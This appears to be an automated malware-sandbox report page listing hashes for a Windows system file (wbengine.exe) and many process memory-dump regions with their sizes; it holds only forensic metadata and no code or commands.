Download Submit
C:\Windows\System32\wbengine.exe

Filesize
2.1MB

MD5
1e847509039a68ea45983a0007b4b7f5

SHA1
05a18f976f4270558bce2af635918f5a6015bd89

SHA256
505c534639ab4fbfde71c83f42db43ba30e741a5e26824ec438c14bb16666146

SHA512
7b45a1d1b7b088ca7490b2b085af217efef0c949cfa177c162b85dc99a4496d15fa52ad9a305af84e07777aea789ebdd96a067e179dbcc73fb47bec97e8c12e2

Download Submit
memory/64-1248-0x0000000140000000-0x0000000140179000-memory.dmp

Filesize
1.5MB

Download
memory/64-1597-0x0000000140000000-0x0000000140179000-memory.dmp

Filesize
1.5MB

Download
memory/908-1222-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download
memory/908-1106-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download
memory/916-1231-0x0000000140000000-0x0000000140216000-memory.dmp

Filesize
2.1MB

Download
memory/916-1595-0x0000000140000000-0x0000000140216000-memory.dmp

Filesize
2.1MB

Download
memory/1656-1210-0x0000000140000000-0x0000000140131000-memory.dmp

Filesize
1.2MB

Download
memory/1656-1095-0x0000000140000000-0x0000000140131000-memory.dmp

Filesize
1.2MB

Download
memory/1836-544-0x0000000140000000-0x0000000140130000-memory.dmp

Filesize
1.2MB

Download
memory/1836-1109-0x0000000140000000-0x0000000140130000-memory.dmp

Filesize
1.2MB

Download
memory/2288-1418-0x0000000140000000-0x0000000140168000-memory.dmp

Filesize
1.4MB

Download
memory/2288-1170-0x0000000140000000-0x0000000140168000-memory.dmp

Filesize
1.4MB

Download
memory/2432-1197-0x0000000140000000-0x0000000140147000-memory.dmp

Filesize
1.3MB

Download
memory/2432-1539-0x0000000140000000-0x0000000140147000-memory.dmp

Filesize
1.3MB

Download
memory/2436-109-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-49-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-69-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-67-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-66-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-65-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-59-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-64-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-63-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-62-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-61-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-58-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-57-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-54-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-56-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-113-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-90-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-92-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-93-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-94-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-96-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-97-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-98-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-101-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-87-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-103-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-85-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-83-0x0000000000400000-0x0000000000500000-memory.dmp

Filesize
1024KB

Download
memory/2436-84-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-70-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-71-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-68-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-104-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-50-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-106-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-105-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-82-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-53-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-107-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-108-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-81-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-110-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-102-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-79-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-86-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-78-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-77-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-111-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-95-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-112-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-72-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-99-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-73-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-100-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-76-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-88-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-80-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-75-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-55-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-89-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-91-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-74-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2436-60-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2720-541-0x0000000026940000-0x0000000026EE4000-memory.dmp

Filesize
5.6MB

Download
memory/2720-1198-0x0000000027ED0000-0x0000000027F62000-memory.dmp

Filesize
584KB

Download
memory/2720-515-0x0000000000400000-0x0000000000552000-memory.dmp

Filesize
1.3MB

Download
memory/2720-539-0x00000000245E0000-0x0000000024614000-memory.dmp

Filesize
208KB

Download
memory/2720-542-0x0000000026EF0000-0x0000000026F24000-memory.dmp

Filesize
208KB

Download
memory/2720-1004-0x0000000027240000-0x00000000272DC000-memory.dmp

Filesize
624KB

Download
memory/2720-1424-0x0000000028350000-0x000000002835A000-memory.dmp

Filesize
40KB

Download
memory/2720-1421-0x0000000028170000-0x0000000028332000-memory.dmp

Filesize
1.8MB

Download
memory/2720-1083-0x0000000000400000-0x0000000000552000-memory.dmp

Filesize
1.3MB

Download
memory/2720-1208-0x0000000027F70000-0x0000000027FC0000-memory.dmp

Filesize
320KB

Download
memory/2744-1234-0x0000000140000000-0x000000014011B000-memory.dmp

Filesize
1.1MB

Download
memory/2744-1110-0x0000000140000000-0x000000014011B000-memory.dmp

Filesize
1.1MB

Download
memory/2984-1596-0x0000000140000000-0x000000014014C000-memory.dmp

Filesize
1.3MB

Download
memory/2984-1243-0x0000000140000000-0x000000014014C000-memory.dmp

Filesize
1.3MB

Download
memory/3480-1573-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/3480-1247-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/3480-1122-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/4360-19-0x00000234B90E0000-0x00000234B9102000-memory.dmp

Filesize
136KB

Download
memory/4552-1194-0x0000000140000000-0x00000001401C0000-memory.dmp

Filesize
1.8MB

Download
memory/4552-1182-0x0000000140000000-0x00000001401C0000-memory.dmp

Filesize
1.8MB

Download
memory/4808-1092-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/4808-1196-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/4984-1159-0x0000000140000000-0x0000000140188000-memory.dmp

Filesize
1.5MB

Download
memory/4984-1387-0x0000000140000000-0x0000000140188000-memory.dmp

Filesize
1.5MB

Download
memory/5024-1211-0x0000000140000000-0x00000001401FC000-memory.dmp

Filesize
2.0MB

Download
memory/5024-1570-0x0000000140000000-0x00000001401FC000-memory.dmp

Filesize
2.0MB

Download
memory/5208-1134-0x0000000140000000-0x000000014011C000-memory.dmp

Filesize
1.1MB

Download
memory/5208-1322-0x0000000140000000-0x000000014011C000-memory.dmp

Filesize
1.1MB

Download
memory/5424-1146-0x0000000140000000-0x0000000140169000-memory.dmp

Filesize
1.4MB

Download
memory/5424-1354-0x0000000140000000-0x0000000140169000-memory.dmp

Filesize
1.4MB

Download
memory/5480-1014-0x0000000140000000-0x000000014012F000-memory.dmp

Filesize
1.2MB

Download
memory/5480-1121-0x0000000140000000-0x000000014012F000-memory.dmp

Filesize
1.2MB

Download
memory/5628-1028-0x0000000140000000-0x0000000140135000-memory.dmp

Filesize
1.2MB

Download
memory/5628-1017-0x0000000140000000-0x0000000140135000-memory.dmp

Filesize
1.2MB

Download
memory/5796-1031-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/5796-1145-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/5884-1048-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/5884-1158-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/5988-1053-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/5988-1066-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/6084-1068-0x0000000140000000-0x000000014013F000-memory.dmp

Filesize
1.2MB

Download
memory/6084-1181-0x0000000140000000-0x000000014013F000-memory.dmp

Filesize
1.2MB

Download